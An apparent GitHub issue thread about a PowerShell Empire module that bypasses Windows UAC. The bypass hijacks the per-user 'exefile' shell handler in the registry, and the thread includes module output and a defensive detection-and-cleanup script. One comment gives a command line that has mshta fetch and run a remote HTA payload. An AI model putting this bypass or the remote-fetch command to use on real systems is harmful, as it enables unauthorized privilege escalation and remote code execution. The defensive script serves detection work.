
Windows Local Privilege Escalation Module - SLUI BypassUAC

Open Truneski opened this issue 6 years ago • 7 comments

This is a simple privilege escalation module that was already written in PowerShell by gushmazuko: https://github.com/gushmazuko/WinBypass. It works by simply taking a one-liner (can be anything) to execute our PowerShell Empire payload, and we get a high-privilege Empire shell. Hopefully this helps someone out there like it did on my engagement today. If you have any questions, feel free to ping me on Twitter/Slack, and also feel free to improve it in any way, shape or form.

Truneski avatar Oct 04 '18 15:10 Truneski

Hi,

Unfortunately, your module fails on my lab.

On my W10 test machine: [screenshot from 2018-10-04 21-38-59]

On Empire side:

(Empire: powershell/privesc/bypassuac_slui) > Job started: G2XR3U


Property      : {}
PSPath        : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\exefile\shell\open\command
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\exefile\shell\open
PSChildName   : command
PSDrive       : HKCU
PSProvider    : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 
View          : Default
Handle        : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount    : 
Name          : HKEY_CURRENT_USER\Software\Classes\exefile\shell\open\command

DelegateExecute : 
PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\exefile\shell\open\command
PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\exefile\shell\open
PSChildName     : command
PSDrive         : HKCU
PSProvider      : Microsoft.PowerShell.Core\Registry

Am I missing something ?

:sunflower:
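The registry output above shows what the module leaves behind: a per-user `HKCU\Software\Classes\exefile\shell\open\command` key with a `DelegateExecute` value, which overrides the machine-wide exefile handler for that user. The following check is an added example and is not part of the Empire module or the WinBypass script; the function name `Test-ExefileHijack` and the `-Remove` switch are my own. It reports whether that per-user handler exists, what command it points to, and optionally removes it once the elevated agent has been obtained (or during cleanup after an engagement).

```powershell
# Added example (not from the Empire module or WinBypass): detect and optionally
# remove the per-user exefile handler override that the SLUI bypass relies on.
# Function name and -Remove switch are assumptions chosen for this example.
function Test-ExefileHijack {
    [CmdletBinding()]
    param(
        # Delete the per-user exefile key if an override is present
        [switch]$Remove
    )

    # This is the key shown in the module output above. It does not exist on a
    # clean profile; the real handler lives under HKLM\Software\Classes\exefile.
    $commandKey = 'HKCU:\Software\Classes\exefile\shell\open\command'
    $rootKey    = 'HKCU:\Software\Classes\exefile'

    $result = [pscustomobject]@{
        KeyPresent      = $false
        Command         = $null
        DelegateExecute = $null
        Suspicious      = $false
        Removed         = $false
    }

    if (-not (Test-Path -LiteralPath $commandKey)) {
        return $result   # no per-user override; nothing to report
    }

    $result.KeyPresent = $true
    $props = Get-ItemProperty -LiteralPath $commandKey

    # '(default)' holds the command line that will run for any .exe opened via
    # the shell for this user; DelegateExecute (even empty) forces the shell to
    # honour that command instead of the normal handler.
    $result.Command         = $props.'(default)'
    $result.DelegateExecute = $props.DelegateExecute

    # Any per-user exefile handler is worth flagging; a command plus a blank
    # DelegateExecute is exactly the pattern in the output above.
    if ($result.Command -or ($null -ne $result.DelegateExecute)) {
        $result.Suspicious = $true
    }

    if ($result.Suspicious -and $Remove) {
        # Removing the whole per-user exefile key restores the HKLM handler.
        Remove-Item -LiteralPath $rootKey -Recurse -Force
        $result.Removed = -not (Test-Path -LiteralPath $commandKey)
    }

    return $result
}

# Usage: report only, then clean up.
Test-ExefileHijack | Format-List
Test-ExefileHijack -Remove | Format-List
```

Run this in the same user context the agent runs in, since the key is under HKCU. If `Suspicious` is true and you did not put the key there yourself, treat it as an indicator of a UAC bypass attempt; after a successful bypass, leaving the key in place means every `.exe` the user launches through the shell will keep running the planted command.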

Hmm, honestly I'm not sure. What I did was set the command to execute an .hta file, i.e. set command "c:\windows\system32\mshta.exe http://ip:port/windows.hta"

So keep testing out new things.

Truneski avatar Oct 05 '18 07:10 Truneski

On another test VM: [screenshot: uac]

However if I use the ps1 alone, it works.

:sunflower:

Weeeelllllll, I think I misunderstood. From the beginning I tried to use your module like a normal Empire bypass UAC module: launch it and wait for the new agent to pop. But in fact your module takes a command parameter, mandatory but pre-filled with Default (?), hence the random error on my W10 machine.

I think you should rewrite your module in order to keep the bypass UAC module architecture consistent. A privesc module (like a UAC bypass one) has to launch a second agent (an elevated one). It should be easy to implement (see the other UAC bypass modules).

:sunflower:

It's the main hurdle I came across: adding a launcher to execute automatically. However, I urge you or anyone else (preferably more skilled than me) to look at the code and make improvements. I used the module to great effect on an engagement against a top-tier EDR. I just wanted to submit it here and hopefully see if it can help anyone. That to me will be enough.

Truneski avatar Oct 05 '18 11:10 Truneski

I'll give it a try and implement the correct method; I'll submit a new PR based on this one.

:sunflower:

Awesome dude, I'd appreciate the help.

Truneski avatar Oct 08 '18 17:10 Truneski